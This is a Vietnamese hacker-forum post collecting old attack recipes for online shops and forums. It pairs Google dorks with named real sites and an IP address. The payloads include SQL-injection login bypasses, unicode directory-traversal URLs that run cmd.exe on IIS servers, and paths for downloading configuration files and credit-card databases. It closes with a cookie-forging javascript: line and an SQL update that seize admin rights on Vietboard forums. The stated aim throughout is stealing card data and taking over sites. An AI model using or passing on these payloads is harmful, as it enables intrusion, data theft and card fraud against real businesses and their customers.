Đầu tiên mong các mod thấy nếu bài này phạm quy xin del chứ đừng Ban em. Tội nghiệp. Em sưu tầm cho mấy mem đọc ah. Có thể nó không còn dùng được nhưng có thể làm tư liệu tham khảo
===
I-Lỗi Tek9.asp :
Cách thức tìm : Dùng Google
Câu tìm kiếm : tek9.asp
Kết quả : Bạn tìm các trang web hiện lên , ví dụ là http://198.170.250.68/ tek9_login.asp
Bạn sẽ thêm intranet trước tek9.asp
http://198.170.250.68/intranet/tek9_login.asp
Được gì ? Bạn vào trang đăng nhập của người quản trị.
Tên và mật khẩu : Đều là ‘or”=’
Sau đó ? Bạn tự tìm hiểu vì mỗi trang có 1 sự trình bày hơi khác nhau. Trang trên cho phép bạn quản lý thông số , kiểu , cách thức và vài chỗ có liên quan đến cơ sở dữ liệu chứa thẻ tín dụng. Ngòai ra bạn có thể tìm lệnh Find orders để truy tìm khu vực chức thẻ.
============================
II-Lỗi Cart32 v3.5a
Cách thức tìm : Dùng Google
Câu tìm kiếm : Cart32 v3.5a
Kết quả : Chạy các trang web có tập tin cart32.exe . Bạn sẽ nhận được 1 số thông tin
Được gì ? Chưa được gì hết
Tên và mật khẩu : Không cần
Sau đó ? Giả sử bạn kiếm được trang web sau có lỗi
http://www.connectionsmall.com/scripts/cart32.exe/
Bạn thay từ card32.exe bằng những dòng sau đây :
Code:
I)
..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
II)
..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
III)
..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
Ví dụ :
Code:
http://www.connectionsmall.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
-Nếu không chuyện gì xảy ra thì bạn thêm dòng địa chỉ sau vào cuối cùng để lấy thẻ tín dụng :
\progra~1\MWAInc\Cart32\
-Bạn sẽ thấy những dòng giống như sau :
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta sẽ có giống như thế này :
Code:
http://www.connectionsmall.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc\Cart32\2814659000-001001.c32
============================
III-Lỗi Commerce.cgi
Cách thức tìm : Dùng Google
Câu tìm kiếm : Commerce.cgi
Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi
Code:
http://www.warresisters.org/store/commerce.cgi
Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl
Ví dụ :
Code:
http://www.warresisters.org/store/admin_files/commerce_user_lib.pl
Bạn sẽ nhận được 1 số thông tin :
$sc_sales_tax = “.0825″;
$sc_sales_tax_state = “NY”;
$sc_send_order_to_email = “yes”;
$sc_order_log_name = “onlinebookstore.log”;
$sc_send_order_to_log = “yes”;
$shipping_percentage = “.15″;
$sc_order_email = “wrl\@igc.org”;
$sc_root_url = “http://www.warresisters.org/store”;
$sc_admin_email = “lit\@warresisters.org”;
$sc_domain_name_for_cookie = “.warresisters.org”;
$sc_order_script_url = “https://secure.serve.com/resist/store/commerce.cgi”;
$sc_root_web_path = “/home/serve/resist/Html/Products”;
$sc_path_for_cookie = “/store”;
$path_to_html = “../Html”;
1;
Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu
Tên và mật khẩu : Không cần
Sau đó
Xóa cái commerce_user_lib.pl đi thay bằng dòng chữ tìm ở $sc_order_log_name và ….
============================
III-Lỗi shopdisplaycategories
Cách thức tìm : Dùng Google
Câu tìm kiếm : shopdisplaycategories
Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.asp
Được gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng
Tên và mật khẩu : Không cần
Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên )
============================
IV-Lỗi SQL Injection
Cách thức tìm : Dùng Google
Câu tìm kiếm : admentor
Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là ‘or”=’
Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin
Tên và mật khẩu : ‘or”=’
Sau đó : Bạn tự tìm hiểu
============================
IV-Lỗi datasources
Cách thức tìm : Dùng Google
Câu tìm kiếm : datasources/ hay config/datasources/
Kết quả :Đường dẫn những trang bị lỗi này
Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/
Tên và mật khẩu : Không cần
Sau đó : Bạn tải được kho dữ liệu có credit card
Hacker Forum Vietboard 2.5 , 2.6
Chiếm quyền Admin các forum Vieboard bằng JavaScript Inline
Trước tết tôi có vào các forum này để test thử lỗi JavaScript Inline thì bị “dính” rât nhiều nhưng chưa bị hack, nhưng cho tới bây giờ thì hầu hết đã bị hack. Các phiên bản Vieboard 2.5, 2.6 đều có thể dễ dàng chiếm quyền Admin bằng JavaScript Inline.
Hãy thử gõ đoạn JavaScript dưới vào trình duyệt rồi enter, sau đó refresh lại trình duyệt để thấy link đến Control panel của Admin hoặc truy cập thẳng vào Control panel của Admin (www.victim.com/forum/adm_fr.asp):
javascript:void(document.cookie=”isLogged=mod=False&mSN=Admin&group=1&mid=1″)
Nếu để mSN=Admin thì coi như bạn đã login vào bằng user Admin, nếu mSN= tên đăng ký của bạn thì giống như bạn login vào bằng account của mình nhưng với quyền Admin.
Bạn để ý group=1 trong đoạn JavaScript trên, con số 1 chính là con số cho biết user này là Admin, còn các member là 2.
Sau khi đã vào được Control panel của Admin thì có thể set cho account của bạn có quyền Admin bằng cách gõ câu lệnh SQL dưới vào textbox “SQL Query (For Advanced User Only)” ở phía bên dưới rồi Click vào “Query”:
Update tblMember Set mGroup = 1 Where mSN = ‘tendangkycuaban’
Lưu ý: tên đăng ký của bạn trong câu lệnh SQL được bao bởi cặp dấu nháy đơn.
Nếu không thành công, có thể do admin của forum đã đổi tên file Control panel hoặc đổi tên Cookies, hãy gõ đoạn JavaScript sau vào trình duyệt rồi enter để biết tên Cookie:
javascript:alert(document.cookie)
